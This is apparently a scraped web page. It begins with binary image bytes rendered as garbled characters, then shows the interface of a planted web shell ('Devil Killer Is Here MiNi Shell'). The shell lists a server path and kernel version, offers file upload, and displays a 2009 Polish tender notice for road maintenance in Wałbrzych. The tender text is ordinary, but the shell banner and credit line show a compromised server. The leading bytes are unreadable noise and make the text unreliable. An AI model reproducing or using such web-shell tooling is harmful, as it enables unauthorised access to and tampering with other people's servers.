JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/153531-N-2009.html

<p class="kh_header"><b>Wałbrzych: Wykonanie robót utrzymaniowo - konserwacyjnych na drogach gminnych  i wewnętrznych stanowiących własność Gminy w granicach administracyjnych miasta Wałbrzycha</b><br>
<b>Numer ogłoszenia: 153531 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Komunikacji , ul. Armii Krajowej 35, 58-302 Wałbrzych, woj. dolnośląskie, tel. 074 6414400, 6414408, faks (074) 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdik.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót utrzymaniowo - konserwacyjnych na drogach gminnych  i wewnętrznych stanowiących własność Gminy w granicach administracyjnych miasta Wałbrzycha.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest wykonanie robót utrzymaniowo - konserwacyjnych na drogach  gminnych  i wewnętrznych stanowiących własność Gminy w granicach administracyjnych miasta Wałbrzycha. Zakres rzeczowy: wykonanie prac związanych z utrzymaniem i konserwacją dróg na powierzchni łącznie ok. 14.000 m2.

Zamówienie obejmuje:
1) roboty w zakresie utrzymania, konserwacji i remontów nawierzchni bitumicznych -  wykonywane masami betonu asfaltowego, asfaltu lanego, masami na zimno - na powierzchni ok. 10.300 m2,
2) roboty w zakresie utrzymania, konserwacji i remontów nawierzchni niebitumicznych - należą do nich: roboty brukarskie przy wykonywaniu nawierzchni jezdni z kostek kamiennych, bazaltowych, betonowych;  nawierzchni chodników z  płytek, kostek betonowych, kostek kamiennych, trylinki, a także roboty krawężnikowe i naprawa dróg gruntowych itp. - na powierzchni ok. 3.800 m2.

W przypadku zaistnienia konieczności wykonania robót remontowych,  szczegółowy zakres tych robót  będzie określony w dzienniku budowy, po ich wstępnym uzgodnieniu z Zamawiającym i obligatoryjnym zgłoszeniu do właściwego organu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6, 45.23.32.00-1, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 365.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zadanie nr I - 3000 zł (słownie: trzy tysiące złotych)
Zadanie nr II - 3000 zł (słownie: trzy tysiące złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a. spełniają warunki określone w art. 22 ust. 1 Ustawy oraz nie podlegają wykluczeniu                                z postępowania o udzielenie zamówienia zgodnie z art. 24 Ustawy,
b. spełniają wymagania określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia, 
c. dysponują lub będą dysponować niezbędnym do realizacji zamówienia minimum sprzętowym               i transportowym:

-	zagęszczarka				- szt. 2
-	walec 10 t					- szt. 1
-	walec 7,5 t					- szt. 1 
-	skrapiarka 					- szt. 1
-	piła do cięcia nawierzchni bitumicznej 	- szt. 2
-	młot spalinowy				- szt. 2
-	sprężarka powietrza 			- szt. 1
-	koparko-spycharka lub równiarka    	- szt. 1
-	ciągnik (niezależnie od KM)		- szt. 1 
-	ciągnik z przyczepą (niezależnie od KM)	- szt. 1 
-	samochód wywrotka  max. 10 ton 		- szt. 1
-	kocioł  KAP				- szt. 2
-	frezarka do nawierzchni			- szt. 1
-	piła do cięcia kostki betonowej		- szt. 1
-	recykler					- szt. 1
-	szczotka mechaniczna 			- szt. 1
-	urządzenie do ogrzewania i osuszania remontowanych miejsc - szt. 1
-	beczkowóz 					- szt. 1,
d. dysponują do realizacji zamówienia 2 grupami roboczymi składającymi się z minimum 5-ciu  pracowników  na stanowiskach robotniczych i  kierownika do nadzorowania tych grup,
e. dysponują co najmniej 1 pracownikiem z uprawnieniami budowlanymi w specjalności drogowej do kierowania robotami budowlanymi lub uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń do kierowania robotami budowlanymi,
f. dysponują przynajmniej jednym pracownikiem który będzie brał udział w realizacji zamówienia (kierownika budowy lub pracownika na stanowisku robotniczym) przeszkolonym w zakresie kierowania ruchem na drodze,
g. posiadają bazę oddaloną w odległości nie większej niż 15 km od granic administracyjnych miasta Wałbrzycha,
h. zrealizowali  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym  okresie co najmniej                        2 zamówienia odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia  (prace utrzymaniowe, konserwacyjne, naprawcze, remontowe dróg o nawierzchniach bitumicznych i  niebitumicznych w miastach  - o łącznej powierzchni co najmniej 6.000 m2).

Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia-nie spełnia na podstawie analizy załączonych do oferty dokumentów (określonych w pkt. 6 SIWZ) potwierdzających spełnienie ww. warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a.	Aktualny (czyli odzwierciedlający stan faktyczny) dokument dopuszczający do obrotu  prawnego w  zakresie objętym zamówieniem (odpis z właściwego rejestru lub odpis zaświadczenia o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert).
b.	Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c.	Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1  pkt 9 Ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d.	Oświadczenia, że Wykonawca spełnia wymogi zgodnie z art. 22 ust. 1 Ustawy i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 Ustawy.
e.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymano                  w całości wykonania decyzji właściwego organu - wystawione nie wcześnie niż 3 miesiące przed upływem terminu składania ofert. 
f.	Wykaz osób które będą wykonywać zamówienie lub które będą uczestniczyć w wykonaniu zamówienia. Zamawiający wymaga aby Wykonawca posiadał dwie grupy robocze składające się z min. 5 pracowników na stanowiskach robotniczych do realizacji przedmiotowego zamówienia            i osobę z nadzoru, tj. kierownika do nadzorowania tych grup roboczych. Osoba przewidziana do nadzorowania prac musi posiadać uprawnienia budowlane w specjalności drogowej do kierowania robotami budowlanymi lub uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń do kierowania robotami budowlanymi (należy przedłożyć kserokopię uprawnień). Osoba posiadająca uprawnienia budowlane w specjalności konstrukcyjno-budowlanej musi posiadać doświadczenie min. 3-letnie w kierowaniu robotami w drogownictwie. Należy przedłożyć opis doświadczenia. Ponadto osoba z nadzoru musi być członkiem Okręgowej Izby Inżynierów Budownictwa (należy przedłożyć aktualne zaświadczenie).
g.	Informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego w okresie ostatnich 3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie.
h.	Przynajmniej jeden z pracowników (kierownik budowy lub pracownik na stanowisku robotniczym), który będzie brał udział w realizacji zamówienia ma być przeszkolony w zakresie kierowania ruchem na drodze (należy załączyć dokument potwierdzający ukończenie kursu). Imię i nazwisko tej osoby należy wpisać do tabeli w załączniku nr 8.
i.	Wykaz sprzętu oraz wyposażenia technicznego (Wytwórnia Mas Bitumicznych) którym dysponuje Wykonawca,  przewidzianego do realizacji zamówienia.  Wykonawca  nie posiadający własnej Wytwórni Mas Bitumicznych musi  przedstawić  dokument w formie oświadczenia, potwierdzonego przez właściciela otaczarni o zapewnieniu dostawy masy bitumicznej.
j.	Wykaz urządzeń zabezpieczających, którymi dysponuje Wykonawca służących do oznakowania robót w pasie drogowym, zgodnie z przepisami ustawy - Prawo o Ruchu Drogowym                           i rozpoprządzeniem Ministrów Infrastruktury i Spraw Wewnętrznych i Administracji z dnia                  31 lipca 2002 r. w sprawie znaków i sygnałów drogowych oraz załącznikiem nr 1-4 do rozporządzenia Ministra Infarstruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach. Niezbędne minimum na jedno zadanie: znak B-33 - 4szt.; znak A-14 - 6 szt.;  A-12b - 4 szt.; A-12c - 4 szt.; U-3b - 4 szt.; U-51 - 10 szt.; pachołki U-55 - 20 szt. 
k.	Adres bazy zlokalizowanej na terenie miasta Wałbrzycha lub w odległości nie większej niż 15 km od granic administracyjnych miasta. 
UWAGA! Ze względu na specyficzny rodzaj prac, drobne prace naprawcze i konserwacyjne prowadzone w pasie drogowym pod ruchem, mające bezpośredni wpływ na bezpieczeństwo ruchu drogowego, które należy  wykonać szybko i profesjonalnie nie powodując znacznych utrudnień w ruchu Zamawiający wymaga, aby baza Wykonawcy była zlokalizowana na terenie miasta Wałbrzycha lub w odległości nie większej niż 15 km od granic administracyjnych miasta Wałbrzycha.
Wykonawca, który przetarg wygra przed podpisaniem umowy zobowiązany będzie przedstawić Zamawiającemu oryginał umowy na  dzierżawę (lub inna forma władania) terenu i obiektów pod bazę na terenie miasta  Wałbrzycha  lub zlokalizowaną w odległości nie większej niż 15 km od granic administracyjnych miasta Wałbrzycha.   
l.	Wykonawca musi bezwzględnie podać wykaz ważniejszych robót wykonanych przez Wykonawcę  (wykaz ten stanowi doświadczenie Wykonawcy) odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, zrealizowanych w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym  okresie. W wykazie robót należy podać datę, miejsce wykonania, przedmiot, odbiorców robót wraz z załączeniem dokumentów  potwierdzających, że roboty  te zostały wykonane  należycie. 
m.	Wskazanie części zamówienia, której wykonanie Wykonawca zamierza zlecić podwykonawcom.
n.	Oświadczenie o zapoznaniu się i akceptacji dokumentacji przetargowej.

6.1 Pozostałe dane i wykazy jakie powinien dostarczyć Wykonawca w składanej ofercie

a.	Wykaz osób uprawnionych do podpisania oferty, umowy i podejmowania zobowiązań                w  imieniu Wykonawcy.
b.	Zobowiązanie Wykonawcy do pełnienia dyżurów w dodatkowe dni wolne od pracy, niedziele i święta oraz w przypadku wystąpienia klęsk żywiołowych.
c.	Zastrzeżenie Wykonawcy, które informacje zawarte w jego ofercie nie mogą być udostępniane innym uczestnikom postępowania (stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji). Zamawiający zaleca, aby informacje zastrzeżone jako tajemnica przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji były złożone w oddzielnej wewnętrznej kopercie z oznakowaniem tajemnica przedsiębiorstwa , lub spięte (zszyte oddzielnie od pozostałych, jawnych elementów ofert.
d.	Dowód wpłaty wadium.
6.2 Zasady składania oferty wspólnej przez formę organizacyjną typu konsorcjum
Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia na podstawie art. 23 Ustawy. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełniają warunki udziału            w postępowaniu w następujący sposób:
1.	w przypadku wspólnego ubiegania się o zamówienie publiczne, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
2.	Wykonawcy (wszyscy) występujący wspólnie muszą upoważnić na piśmie pod rygorem  nieważności (art.99 § 2 K.C.) ustanowionego pełnomocnika, jako przedstawiciela  pozostałych,             a jego upoważnienie musi być udokumentowane pełnomocnictwem przez upełnomocnionych przedstawicieli wszystkich pozostałych Wykonawców i dołączone do  składanej oferty,
3.	oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1  Ustawy składa pełnomocnik ustanowiony do reprezentowania wszystkich Wykonawców wspólnie  ubiegających się o zamówienie,
4.	każdy ze wspólnie ubiegających się Wykonawców oddzielnie składa oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 Ustawy wraz z wymaganymi dokumentami potwierdzającymi nie podleganie wykluczeniu z art. 24 Ustawy,
5.	 niezbędna wiedza i doświadczenie, potencjał kadrowy i techniczny każdego ze wspólnie ubiegających się Wykonawców będzie zsumowana, w celu stwierdzenia czy wspólnie spełniają     warunki wymagane od Wykonawcy,
6.	wadium może być wniesione przez jednego z Partnerów lub Pełnomocnika, dokument potwierdzający wniesienie wadium może być parafowany lub potwierdzony za zgodność z oryginałem przez jednego z Partnerów, jeżeli ma on do tego upoważnienie lub przez Pełnomocnika

Wszelka korespondencja oraz rozliczenia dokonywane będą z Pełnomocnikiem.
Wypełniając formularz ofertowy, składając oświadczenie o spełnianiu warunków udziału                    w postępowaniu, jak również wypełniając inne dokumenty powołujące się na Wykonawcę  w miejscu np. Nazwa i adres Wykonawcy należy wpisać dane dotyczące konsorcjum (wymienić wszystkich Wykonawców wspólnie ubiegających się o zamówienie).

Powyższe dokumenty i oświadczenia winny być udzielone w formie pisemnej (w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę) i mają stanowić załączniki do oferty przetargowej. 
Wykonawcy zagraniczni:
Wykonawca zagraniczny (mający siedzibę lub miejsce zamieszkania poza terytorium Polski) zamiast dokumentów wskazanych w pkt. 6.a i 6.e SIWZ składa dokument lub dokumenty wystawione                    w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
Dokumenty, o których mowa w lit. a i c powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w lit. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału               w postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów. 
Dokumenty żądane na potwierdzenie spełnienia wymaganych warunków Wykonawca może dołączyć w formie kserokopii poświadczonej przez niego za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdik.walbrzych.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Komunikacji w Wałbrzychu,	ul. Armii Krajowej 35, 58-302 Wałbrzych, pok. 103
cena 20 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 11:00, miejsce: Zarząd Dróg i Komunikacji w Wałbrzychu,	ul. Armii Krajowej 35, 58-302 Wałbrzych, pok. 108, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I	  
obejmuje osiedla: Książ, część Szczawienka, część Piaskowej Góry, Podzamcze, Biały Kamień, Konradów, część Starego Zdroju, Sobięcin, część Śródmieścia, Gaj, Glinik Nowy..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty konserwacyjno - utrzymaniowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6, 45.23.32.00-1, 45.23.32.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 365.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II   
obejmuje osiedla: Lubiechów, część Szczawienka, WSSE, Poniatów, część Piaskowej Góry, część Starego Zdroju, Nowe Miasto, część Śródmieścia, Kozice, Rusinowa, Podgórze, Glinik Stary..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty konserwacyjno - utrzymaniowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6, 45.23.32.00-1, 45.23.32.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 365.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com